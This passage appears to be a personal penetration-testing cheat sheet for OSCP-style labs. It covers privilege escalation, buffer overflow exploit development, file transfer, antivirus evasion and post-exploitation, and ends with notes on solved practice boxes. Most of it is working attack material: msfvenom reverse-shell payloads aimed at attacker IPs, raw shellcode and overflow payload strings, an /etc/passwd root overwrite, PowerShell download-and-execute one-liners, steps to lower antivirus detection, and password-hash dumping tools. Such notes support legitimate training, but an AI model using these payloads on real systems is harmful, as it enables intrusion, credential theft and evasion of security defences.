./linpeas.sh -a > linpeas.txt
~~~
Other enum-scripts
~~~
wget 192.168.1.128/LinEnum.sh
wget 192.168.1.128/linuxprivchecker.py
wget 192.168.1.128/upc.sh

chmod 777 *.sh *.py

./LinEnum.sh -t > linenum.txt
python linuxprivchecker.py > linuxprivchecker.txt
./upc.sh detailed > upc.txt 
~~~

**usage enum scripts**  
winpeas, linpeas:  
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

~~~
linpeas.sh -a
~~~
~~~
LinEnum.sh -s [-k keyword] -r linenum.txt -e /tmp/ -t  
~~~
~~~
ups.sh { standard | detailed } > /tmp/upc.txt
~~~

**Others**  
https://guif.re/linuxeop

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://myexperiments.io/linux-privilege-escalation.html

google: netsec.ws privilege escalation scripts

**EXIM with perl_startup**  
```
/usr/sbin/exim -bV -v | grep -i perl
```
contains perl ... exploit possible?

https://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.html


**change (root) passwd in /etc/passwd if writable**  
generate md5 pw-hash with salt 
~~~
openssl passwd -1 -salt mysalt mypassword
$1$mysalt$JyKGOJR1343sJ7N91hXVI/
~~~
-> copy it into /etc/passwd
~~~text
root:$1$mysalt$JyKGOJR1343sJ7N91hXVI/:0:0:root:/root:/bin/bash
~~~

**get ROOT-Shell with MySQL-root access**  
https://recipeforroot.com/mysql-to-system-root/

**get ROOT-Shell with MySQL with Linux-sudo-root access**  
~~~
sudo /usr/bin/mysql

\! bash -p
~~~

### **5.2 WINDOWS**
https://guif.re/windowseop

https://www.fuzzysecurity.com/tutorials/16.html

Winpeas ???

Check
~~~
hostname  
dir /s
set pro
systeminfo

whoami /priv
whoami /all  
~~~

If *SeImpersonatePrivilege* enabled  
**PrintSpoofer** https://github.com/itm4n/PrintSpoofer/releases  
or  
**Juicy-Potato** https://github.com/ohpe/juicy-potato/releases  (only if DCOM   is activated on server)

1. Copy .exe to target 

1. run
    ~~~text
    PrintSpoofer64.exe -i -c powershell.exe

    C:> whoami
    ~~~

**Reverse SHELL**  
~~~text
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.9.1.143 lport=4444 -f aspx -o shell.asp
~~~

**Get Nishang Reverse Shell**  
see Reverse SHELL Windows  
for Backspace, history etc.

**MSF Shell to Meterpreter**
background shell (Cntl-Z)
~~~text
use post/multi/manage/shell_to_meterpreter
sessions -l
set session <session id>
run

sessions -l
sessions -i <meterpt. session id>
~~~
try get admin rights the easy way
~~~
getsystem

# if it fails, search "bypassuac".
~~~

Otherwise find a process with NT AUTHORITY\SYSTEM
~~~
ps

migrate <process id>

hashdump
~~~

**Sensitive Files / Folders**
c:\windows\system32\config\regback

**Enumeration Scripts**
JAWS

### **5.3 Meterpreter**
help for commands

## **6. BOF - Buffer Overflow**
---
**Methodology**:  
https://github.com/justinsteven/dostackbufferoverflowgood  
https://raw.githubusercontent.com/justinsteven/dostackbufferoverflowgood/master/dostackbufferoverflowgood_slides.pdf  
https://guif.re/bo  

### **6.1. Memory Overview**  

1. ESP points to the top of the STACK, EIP to the next operation.

1. We want to overwrite EIP with the address of a 'JMP ESP' operation.  

1. Directly after EIP comes the STACK where we put our SHELLCODE to.

Payload is everything in "...":
~~~text
+----------------+
|"AA...          | <- EDX (Data)
|                |
|          ..AA..|
+----------------+
|EBP  .........AA|
+----------------+
|EIP  625011AF   | <- addr. to a JMP ESP / CALL ESP
+----------------+
|STACK  NOP ..   | <- ESP (Stack pointer)
|..NOP SHELLCODE"|
+----------------+
~~~


### **6.2. Bad characters**  
~~~text
badChars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
~~~

### **6.3. Check if vulnerable**  
~~~text
generic_send_tcp $IP 9999 fuzzer.spk 0 0
~~~
with fuzzer.spk
~~~
s_readline();
s_string("TRUN ");
s_string_variable("FUZZ");
~~~

### **6.4. Troubleshooting**  
#### **6.4.1 Move shellcode if necessary**  
1) move shellcode in buffer (**NOP + Sh-Code + NOP + Addr.** instead of NOP + Sh-Code + Addr.)  
~~~
run $(python -c "print '\x90'*140 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + '\x90'*100 +'\xf0\xfa\xff\xbf'")
~~~
2) add some "buffer" to the start address as addresses aren't stable, e.g.
~~~
...+'\xff\xfa\xff\xbf'
~~~
instead of
~~~
...+'\xf0\xfa\xff\xbf'
~~~
3) use different shellcode (e.g. not pushed to stack)


#### **6.4.2 Error at shellcode generation**  
Try different encoder, e.g.
~~~
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.110.131 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00\x2e\x2d\x46\x47\x5d\x5e" -e x86/fnstenv_mov
~~~
instead of
~~~
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.110.131 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00\x2e\x2d\x46\x47\x5d\x5e"
~~~
or
~~~
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.110.131 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00\x2e\x2d\x46\x47\x5d\x5e" -e x86/shikata_ga_nai
~~~


#### **6.4.3 Use a different JMP ESP adress - if more available**  
Also jmp esp pointer can have a **bad character**!!!  
Use an other one!

### **6.4.4 Crash but EIP not overwritten**  
SEH based Buffer Overflow:  
https://sghosh2402.medium.com/vulnserver-gmon-command-exploit-1cdde13d2d64




## **6a. BOF - Buffer Overflow - LINUX with GDB**
---
GDB cheat sheets  
https://cs.brown.edu/courses/cs033/docs/guides/gdb.pdf

https://liodeus.github.io/2020/11/13/GDB.html

GDB with **64bit** executable:  
https://dl.packetstormsecurity.net/papers/attack/64bit-overflow.pdf

### **6a.1 Check exec's sec settings**
~~~
gdb <exec>
checksec
~~~
Run these several times to see if return address changes (ASLR)
~~~
ldd <exec> | grep system
ldd <exec> | grep libc
~~~
If so disable it on (local) machine
~~~
echo 0 > /proc/sys/kernel/randomize_va_space
~~~
If with debug info and not stripped:
~~~
readelf -wl ./a.out
~~~

### **6a.2 Find START OF BUFFER for setting EIP(32bit) or RIP(64bit)**
(**with 64bit** RIP cannot be set all x42's ('B'*8), that memory does not exist. Try only 4-6 'B's...)

~~~
gdb ./example

info functions

disas main
~~~
look for a "call", e.g. `call   0x8048350 <strcpy@plt>`
~~~
   0x0804848b <+71>:	call   0x8048350 <strcpy@plt>
   0x08048490 <+76>:	mov    $0x8048591,%eax
   0x08048495 <+81>:	lea    0x10(%esp),%edx
   0x08048499 <+85>:	mov    %edx,0x4(%esp)
   0x0804849d <+89>:	mov    %eax,(%esp)
   0x080484a0 <+92>:	call   0x8048340 <printf@plt>
~~~
set break point after the call (e.g. last line in function: `mov    %eax,(%esp)` ) and run with input param to test:
~~~
break *0x804849d
run $(python -c "print 'A'*257")
~~~
examine registers
~~~
i r
~~~
examine 200 spaces in memory and look for first 0x41:
~~~
x/200xb $esp
(gdb) 0xbffffad0:	0xe0	0xfa	0xff	0xbf	0xe0	0xfa	0xff	0xbf
0xbffffad8:	0x01	0x00	0x00	0x00	0xb0	0x08	0x00	0x00
0xbffffae0:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffae8:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
...
~~~
here it's `0xbffffae0` - the **start of buffer**.

### **6a.3 Find size of buffer - OFFSET to overwrite EIP**
Create pattern in Kali and save it in a file (pat.txt) on target:
~~~
/usr/bin/msf-pattern_create -l 300 > pat.txt
~~~
Quit (=delete all breakponts and reset) and restart gdb
~~~
quit
gdb ./example
~~~
Keep increasing the input length until segfault with `0x41414141`
~~~
run $(cat pat.txt)
Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()
~~~
  
Find offset in Kali:
~~~
/usr/bin/msf-pattern_offset -q 0x6a413969
[*] Exact match at offset 268
~~~

**buffer size / offset** is 268.

### **6a.4 Find BAD CHARACTERS**
see Chapter 6
Run with payload
~~~
payload = 'A' * offset + 'B' * 4 + badChars
~~~
check data at ESP value ??? how to in GDB ???
-> exclude all bad chars that truncate or fall out of line.

### **6a.5 Get shellcode**  
Look for a simple "execve", e.g. "Linux/x86 - execve(/bin/sh) - **28 bytes** by Jean Pascal Pereira"  
http://shell-storm.org/shellcode/

**smallest shell code** ???
~~~
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
~~~

Calculate buffer size - shellcode size 
e.g. **268 - 28 = 240**, then run with input  
240 NOP + shellcode + start address of buffer (little-endian!):
~~~
run $(python -c "print '\x90'*240 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + '\xe0\xfa\xff\xbf'")
~~~
Actual exploit directly on executable, not in GDB!
~~~
/some/dir/r00t $(python -c "print '\x90'*240 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + '\xe0\xfa\xff\xbf'")
~~~

**Reverse shell**
~~~
msfvenom --platform linux -p linux/x86/shell_reverse_tcp LHOST=192.168.1.139 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00" -e x86/fnstenv_mov
~~~

if we have **bad chars**
~~~
msfvenom --platform linux -p linux/x86/shell_reverse_tcp LHOST=192.168.1.139 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00\x09\x0a\x20" -e x86/fnstenv_mov
~~~

or execute /bin/sh if **already on target** (lateral movement)
~~~
msfvenom --platform linux -p linux/x86/exec CMD=/bin/sh -f python -a x86 -b "\x00\x09\x0a\x20" -e x86/fnstenv_mov
~~~

### **6a.6 Find JMP ESP or CALL ESP instruction address**
(tbd ???)  
-> `0x625012b8`

in GDB
~~~
info proc map

find /b <from addr>, <to addr>, 0xff, 0xe4

e.g.
find /b 0x7ffff7a3a000, 0x7ffff7bcf000, 0xff, 0xe4
~~~
!!!
Try to put shellcode into an env-variable, get the addess of the variable and set EIP/RIP to this address:  
https://oliverhough.cloud/writeups/pinkys-palace-v1/

### **6a.7 Exploit**  
Address `0x625012b8` as little-endian!
~~~
payload = 'A' * offset + '\xb8\x12\x50\x62' + NOPS + shellcode
~~~


## **6b. BOF - Buffer Overflow - WINDOWS**
---
Turn Anti-Virus / Defender off  
Start > Setting > Antivirus > Manage Settings > Realtime protection > Off

Run Immunity Debugger and attach to a running programm or open one
... **both as Administrator !?**

Run on Kali to call the service ($IP is IP of the windows machine with immunity debugger)
~~~
nc $IP 9999
~~~

### **6b.1 Check exec's sec settings**
Usage:  
open CMD in the folder where the executable is (e.g. Downloads)
~~~text
C:\Users\stw\Downloads\windows.Win32.Release\build\Release\winchecksec.exe brainpan.exe
~~~

### **6b.2 Find START OF BUFFER for setting EIP**
~~~
python -c "print 'A'*2000" | nc 192.168.1.128 9999
~~~

### **6b.3 Find size of buffer - OFFSET to overwrite EIP**

Generate pattern as input. See generated pattern in c:\mona\
~~~
!mona pc 2000
~~~
Take pattern from  c:\mona\ and run 
~~~
echo "Aa0Aa1Aa2Aa3Aa4Aa5A ... " |  nc 192.168.1.128 9999
~~~


Copy value of EIP (e.g. 65433765) and
~~~
!mona po 65433765
~~~
resulting in offset equals **1702**:
~~~
0BADF00D   !mona po 65433765
0BADF00D   Looking for e7Ce in pattern of 500000 bytes
0BADF00D    - Pattern e7Ce (0x65433765) found in cyclic pattern at position 1702
~~~

### **6b.4 Find BAD CHARACTERS**
Copy /usr/local/bin/bof.py.

Run bof.py with payload
~~~
payload = 'A' * offset + 'B' * 4 + badChars
~~~
right-click on ESP value -> Follow in Dump -> check data in Dump Window  
-> exclude all bad chars that truncate or fall out of line  
-> collect them for shell generation!

### **6b.5 Get shellcode**  
http://shell-storm.org/shellcode/

**Reverse Shell**
~~~
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.110.131 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00" -e x86/fnstenv_mov
~~~
if we have bad chars
~~~
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.110.131 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00\x2e\x2d\x46\x47\x5d\x5e" -e x86/fnstenv_mov
~~~

Try different encoder
~~~
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.110.131 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00" -e x86/shikata_ga_nai
~~~

If only ASCII chars allowed use **alpha_mixed-encoder** and **BufferRegister=ESP**  
no NOP sled needed!
~~~text
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.234.149 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00" -e x86/alpha_mixed BufferRegister=ESP
~~~
### **6b.6 Find JMP ESP instruction address**
Search for the module which has no protection (ASLR, etc.) and memory range has no BAD CHARs (e.g. \x00)
~~~text
!mona modules
~~~
Search for jmp esp in the kernel dll
~~~text
!mona jmp -r esp -m kernel
~~~
or specific dll if available (here login_support.dll)
~~~text
!mona jmp -r esp -m login_support
~~~
giving 
~~~
0BADF00D   [+] Results :
625012B8     0x625012b8 : jmp esp |  {PAGE_EXECUTE_READ} [login_support.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\stw\login_support.dll)
625012C5     0x625012c5 : jmp esp |  {PAGE_EXECUTE_READ} [login_support.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\stw\login_support.dll)
0BADF00D       Found a total of 2 pointers
...
~~~
the **address `0x625012b8`**.

### **6b.7 Exploit**  
Address `0x625012b8` as little-endian!
~~~
payload = 'A' * offset + '\xb8\x12\x50\x62' + NOPS + shellcode
~~~

## **6c. BOF - Buffer Overflow - LINUX with EDB**
---

### **6c.1 Check exec's sec settings**
Run these several times to see if return address changes (ASLR)
~~~
ldd <exec> | grep system
ldd <exec> | grep libc
~~~
If so disable it on (local) machine
~~~
echo 0 > /proc/sys/kernel/randomize_va_space
~~~
If with debug info and not stripped:
~~~
readelf -wl ./a.out
~~~

### **6c.2 Find START OF BUFFER for setting EIP**
Try to crash, keep increasing length
~~~
edb --run ./validate $(python -c "print 'A'*300" ) &
~~~

### **6c.3 Find size of buffer - OFFSET to overwrite EIP**
Quit edb (Alt+X) and restart with pattern as input
~~~
edb --run ./validate $(/usr/bin/msf-pattern_create -l 300 ) &
~~~
Crash with EIP `39644138`

Find offset in Kali:
~~~
/usr/bin/msf-pattern_offset -q 0x39644138
[*] Exact match at offset 116
~~~

**buffer size / offset** is 116.

### **6c.4 Find BAD CHARACTERS**
Copy /usr/local/bin/bof.py.

Run bof.py with payload
~~~
payload = 'A' * offset + 'B' * 4 + badChars
~~~
right-click on register value (EAX, ESP,...) where payload starts -> Follow in Dump -> check data in Dump Window
-> exclude all bad chars that truncate or fall out of line
-> collect them for shell generation!

### **6c.5 Get shellcode**  
http://shell-storm.org/shellcode/

**smallest shell code** ???
~~~
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
~~~

**Reverse shell**
~~~
msfvenom --platform linux -p linux/x86/shell_reverse_tcp LHOST=192.168.1.139 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00" -e x86/fnstenv_mov
~~~

if we have bad chars
~~~
msfvenom --platform linux -p linux/x86/shell_reverse_tcp LHOST=192.168.1.139 LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00\x09\x0a\x20" -e x86/fnstenv_mov
~~~

or execute /bin/sh if already on target (lateral movement)
~~~
msfvenom --platform linux -p linux/x86/exec CMD=/bin/sh -f python -a x86 -b "\x00\x09\x0a\x20" -e x86/fnstenv_mov
~~~

### **6c.6 Find JMP ESP instruction address**

~~~
objdump -D validate | grep esp | grep jmp
objdump -D validate | grep eax | grep call
~~~

OR

1. in EDB go to Plugins -> OpcodeSearcher -> What To Search For: `ESP -> EIP` (= JMP ESP)  
(or other register instead of ESP under control -> different payload structure!)

1. select Name with Exec-Permission (r-x)

1. Find

1. take 1st address -> `0x080484af`

### **6c.7 Exploit**  
Address `0x080484af` as little-endian!
~~~
payload = 'A' * offset + '\xaf\x84\x04\x08'  + NOPS + shellcode
~~~
In case we use for example EAX, we have a different payload structure (NOPS 8 and shellcode 90 char long):
~~~
payload = NOPS + shellcode + '\x90'*(offset - 8 -90) + '\xaf\x84\x04\x08' 
~~~




## **7. File Transfer**
---

### **7.1 HTTP / wget / curl**
host the payload:  
~~~
python3 -m http.server 80
~~~

copy it over to target on Linux  
~~~
wget -O my_badge.jpg $IP/my_badge.jpg
curl $IP/my_badge.jpg --output my_badge.jpg
~~~
on Windows  
~~~
certutil -urlcache -f http://10.10.14.25/<payload file> <target file>
~~~

### **7.2 NetCat**
**Sender**:  
~~~
nc -nvlp 1111 -w 10 < payload.php  
~~~
**Reciever**:  
~~~
nc -w 10 192.168.1.15 1111 > payload.php
~~~

### **7.3 FTP**
Attacker:  
~~~
apt install python-pyftpdlib  
python -m pyftpdlib -p 21 -w
~~~

Target:  
~~~
ftp <attacker IP>  
binary
...
~~~

### **7.4 MSF / Meterpreter**
upload / download in meterpreter (see help commands)

use auxiliary/server/ftp

### **7.5 TFTP**
server:  
~~~
atftp --daemon --port 69 /var/www/html
~~~

client:  
~~~
tftp -i 192.168.1.97 get <file name>
~~~

### **7.6 Powershell**
in cmd:  
~~~
echo $storage = $pwd > get.ps1  
echo $webclient = New-Object System.Net.Webclient >> get.ps1  
echo $url = "http://192.168.1.97/filename" >> get.ps1  
echo $file = "<file name>" >> get.ps1  
echo $webclient.DownloadFile($url,$file) >> get.ps1  

powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
~~~

### **7.7 in Windows**
~~~text
# FTP 
echo open <IP> 21 > ftp.txt echo anonymous>> ftp.txt echo password>> ftp.txt echo binary>> ftp.txt echo GET <FILE> >> ftp.txt echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

# SMB
copy \\<IP>\<PATH>\<FILE> # Linux -> Windows
copy <FILE> \\<IP>\<PATH>\ # Windows -> Linux

# Powershell
powershell.exe (New-Object System.Net.WebClient).DownloadFile('<URL>', '<DESTINATION_FILE>')
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('<URL>')
powershell "wget <URL>"

# Python
python.exe -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE>')"

# CertUtil
certutil.exe -urlcache -split -f "<URL>"

# NETCAT
nc -lvp 1234 > <OUT_FILE> 
nc <IP> 1234 < <IN_FILE>

# CURL
curl <URL> -o <OUT_FILE>
~~~

### **7.8 through DNS**
https://github.com/TryCatchHCF/PacketWhisper

1. Set DNS server on target to the kali-IP.

1. start tcpdump on kali
    ~~~
    tcpdump -w data_transfer.pcap -i tap0
    ~~~

1. on target: start packetwhisper / 1. transmit file via DNS

1. on kali: start packetwhisper / 2. extract file from PCAP


### **7.9 Check ports & protocolls for File Transfer (firewall...)**
https://github.com/stufus/egresscheck-framework

1. start on kali `python ecf.py`

1. set TARGETIP, SOURCEIP, PROTOCOLL=ALL

1. `generate python`

1. copy python code to target

1. `generate tcpdump` 

1. run tcpdump cmd on kali **with correct interface at the end** (e.g. `... -i tap0`)

1. run python code on target

1. run tshark cmd (from generate tcpdump) on kali


## **8. Powershell**
---

run a ps1 skript  
~~~
powershell.exe -exec bypass -Command "& {Import-Module .\<ps1 skript> <parameter list>}"
~~~

## **9. Antivirus bypassing**
---

generate payload / executable:  
~~~
msfvenom -p windows/shell_reverse_tcp LHOST=<kali IP> LPORT=4444 -f exe -o myshell1.exe
~~~

test myshell1.exe in virustotal -> many hits!

add encoding:  
~~~
msfvenom -p windows/shell_reverse_tcp LHOST=<kali IP> LPORT=4444 -f exe -e x86/shikata_ga_nai -o myshell.exe
~~~

test myshell2.exe in virustotal -> less hits!

encoding and embed in an other file:  
~~~
msfvenom -p windows/shell_reverse_tcp LHOST=<kali IP> LPORT=4444 -f exe -e x86/shikata_ga_nai -x /usr/shell/windows-binaries/nc.exe -o myshel3.exe
~~~
test myshell3.exe in virustotal -> even less hits!

## **10. Post Exploitation**
---
Look for pivot opportunities, credentials, ssh keys, hashes, etc.

## **10.1 Linux Post Exploitation**
~~~
route -n

netstat -anop |grep LISTENING

arp -a

cat /etc/password  
cat /etc/shadow
~~~

google  
linux post exploitation cheat sheet


## **10.2 Windows Post Exploitation**
**dump NTLM passwords:**  
~~~
fgdump.exe
~~~
~~~
pwdump7.exe
~~~
~~~
wce.exe
~~~

**network info:**  
~~~
ss -lntpt

route print

arp -a

netstat -anop
~~~

**hidden folders**  
~~~
dir /A
~~~

## **11. Proof screenshot !!!**
---
Windows
~~~text
type local.txt && whoami && hostname && ipconfig

type proof.txt && whoami && hostname && ipconfig
~~~

Linux
~~~text
cat local.txt && whoami && hostname && ip a

cat proof.txt && whoami && hostname && ip a
~~~



## **12. Stuck?**
---
1. Get **EVERY version** number! Do the version numbers tell you anything about the host?

1. Check **EVERY port**! Have you confirmed the service on the port manually and googled all the things (the SSH string, the banner text, the source)? Portknocking?

1. Is there a service that will allow you to enumerate something useful (i.e. usernames) but maybe doesn't make that obvious (e.g. RID brute-force through SMB with crackmapexec or lookupsid.py, SMTP or SSH for usernames)?

1. Searchsploit! Google for CVE's and exploits. Newer distros have most probably misconfiguration vulns instead of kernel / software vulns.

1. Have you used the **BEST wordlist** possible for your tasks (is there a better/bigger directory list? Is there a SecLists cred list for this service?). Try **wfuzz** or manual dirbusting!

1. Look for **VHOSTS** (gobuster [dns|vhost]), cat /etc/hosts on DNS server

1. Have you fuzzed the directories you have found for a) more directories, or b) common filetypes -x php,pl,sh,etc

1. Have you tried some manual testing (MySQL, wireshark inspections)

1. Tried **ALL** default credentials? (google)

1. Have you collected **ALL** the hashes and cracked them?

1. Brute force **ALL** possible cred combinations (users.txt, passwords.txt+rockyou.txt, cewl, patator)

1. Brute force **ALL** possible services (http **and https**, ssh, ftp, weblogin, etc.)

1. Try medusa instead of hydra? (e.g. use medusa for smb!)

1. Have you tried **ALL** SQLI lists? Have you tried SQLI HTTP-Header parameters? Referer, User-Agent...

1. Can you think of a way to find more information: More credentials/users, more URLs, more files, more ports, more access?

1. Exploitation  
Directory traversal for credentials or useful information?  
Check: Shells: reverse / bind / secure / staged/unstaged payloads Php? Php file upload and upload nc to the machine  
Can upload NC?  
PHP File uploader  
Web shell for command execution  
Upload for reverse shells  
Don't forget binaries can be executed too.  
Search up Kernel  
Null byte %00 

1. Try metasploit, owaspZAP

1. Do you need to relax some of the terms used for searching? Instead of v2.8 maybe we check for anything under 3.

1. Do you need a break?

## **13. Further Ressources**
---
**All pentest tools, ressources, etc.**  
https://kalitut.com/penetration-testing-resources/

OSCP - survival guide - commands, methodology:  
https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md

WebApp - test mind-map:  
https://www.amanhardikar.com/mindmaps/webapptest.html



## **14. Enumeration**
---
Box Enumeration Results (user/footholds/pivoting before root/admin)
- year of the pig  
- usernames via SMB, brute force website, search bar sanitizes input and encodes with base64 shown via HTTP headers, encode shell with base64 and send with repeater through JSON value for initial access  
- nmap full scan finds IIS webserver port 49663 with same directory as SMB share, they have common link + SMB is writiable leads to aspx webshell  
- ftp server with anonymous login has binary creds file, convert to ASCII and/or unpickle contents of file and format with python leads to initial foothold, lateral movement from ps aux finds user python file to copy and decode with uncompyle6, file has SWX (7321) creds to copy user SSH keys  
- nmap reveals JSONP endpoints, a type of XSS attack that doesnt verify requests, with dirsearch finding login.js page indicating login bypass by setting cooking to SessionToken. Spoofing cookie from login.js page reveals SSH key and username, cracked with ssh2john  
- enum reveals domain controller running kerberos/ldap, usernames found on webserver & kerbrute validates 3/6. SMB required password brute force with custom wordlist using cewl and smbpasswd to change. SMB lists 2 specific shares associated with printers. MSRPC enumdomusers reveals service printer account and enumprinters reveals account password for evil-winrm.  
- dirsearch reveals /content with specific webserver platform name. searchsploit platform reveals method of obtaining creds in .sql file, crack hashed password for login. PHP Code execution in Ads subsection for reverse shell  
- dirsearch shows /panel and /uploads for file upload bypass with PHP file. PHP files blocked but similar PHTML files allowed for reverse shell.  
- SMB enum finds .exe in unique share, nmap finds webserver on port 31337 accepting unauthorized input, testing with nc confirms, analyzing exe wih immunity debug reveals buffer overflow (offset, bad chars, JMP ESP, msfvenom shellcode) for user shell
- FTP server contains .exe and .dll to be extracted and analyzed for buffer overflow system shell  
- dirsearch finds /bin directory with .exe to analyze with immunity debug for user shell  
- wpscan for valid admin username, brute force with rockyou and edit website 404.php theme for initial shell, enum shows local port 8080 running with user creds found in /opt for SSH tunnel, docker escape with brute forcing local webserver and shell with javascript console  
- subversion port 3690 with website revision repo, repo contains alt domain name and .db file with usernames, svn checkout revision 2 for powershell file with website creds, clone repo in Azure DevOps for aspx shell and commit to new domain for initial shell, lateral movement from winPEAS showing mounted W: drive with svn repos, conf directory contains password (valid username in \Users)  
- answer to password reset question in fake employee picture filename, platform found on site with CVE, SMB with creds has .deb of platform, CVE explains to capture user hash with responder by locally running .deb using creds and domain, injecting XSS payload, crack hash for evil-winrm  
- nmap full/UDP scan shows SNMP 161, onesixtyone for community string to use with snmp-check shows username, brute force smb with rockyou for password to use with evil-winrm   
- enum shows likely domain controller with DNS/LDAP/KER, dig shows unsecured dynamic DNS updates to impersonate server, dirsearch finds .pfx certificate & pfx2john extracts password, openssl extracts contents and impersonates key/cert, nsupdate to add DNS record, responder to capture user hash for web powershell console  
- python website icon reveals /account directory that points to /search source code which uses encoded_cookie deserialized with python, initial shell with PoC edited to decode UTF-8 and send GET request with shell cookie, escape docker by SSH tunnel to brute force SSH on host using website usernames  
- SQL injection through dev tools cookie value to write hex encoded cmd PHP shell to website directory, download PHP reverse shell wih cmd for initial access, lateral movement to user with forensic analysis log containing plaintext SSH password  
- hidden web directory with write permissions, upload PHP shell  
- webserver on port 8080, platform & version CVE, public exploit upload nc executable  
- union based SQLi to username and hashed password  
- webserver port 8080 with default creds, command injection with powershell  
- sensitive data (creds) found on SMB samba server, login to webserver to find platform & version CVE for LFI and reverse PHP shell  
- FTP platform & version number revealed from searchsploit to download and mount file system for ssh keys  
- SMB share w/ AD usernames, lateral movement by pivoting with TGT hashes/unique RPC password permissions, download another share with LSASS dumped hashes to pass the hash with evil-winrm  
- port 8080 home webpage displays platform & version CVE for system escalation RCE with PHP reverse shell through command injection  
- brute forcing webserver admin account with hydra http-post-form (login page, request body, error message) leads to platform & version for file upload (shell)  
- showmount port 2049 NFS reveals website backup folder with mount permissions, contents reveal platform & version CVE that needs creds, creds found via strings in .sdf binary database  
- default nmap scripts reveal eternalblue exploit, found public script  
- contact page on home webpage reveals platform & version CVE for public script. unstable shell so send cmd with nc  
- blog on webpage reveals a poem that alludes to a popular culture character, syntax revealed on other post and password on /robots.txt  
- platform found and version found from searching where its located, leads to CVE for SQLi leads to creds  
- creds found via hacked social media in pastebin, brute force pop3 with hydra for valid account, find 2 messages with temp password, one account valid  
- dirsearch reveals platform & CVE (authenticated), googling leads to default creds, specific platform tool & nullbyte article how to get a shell, can upload any file with curl, PHP reverse shell  
- wordpress server, bruteforce with wpscan for user creds, privesc with searchsploit wordpress privesc for profile update with ure_other_roles=admininstrator  
- website wih .pcap file, multiple connections from client, knock ports with knock && nmap, knock again for now open port leads to hidden directory, repeats process for hidden message with next port numbers spaced??, repeat process leads to knock && ssh revealing creds, ssh creds /bin/sh  
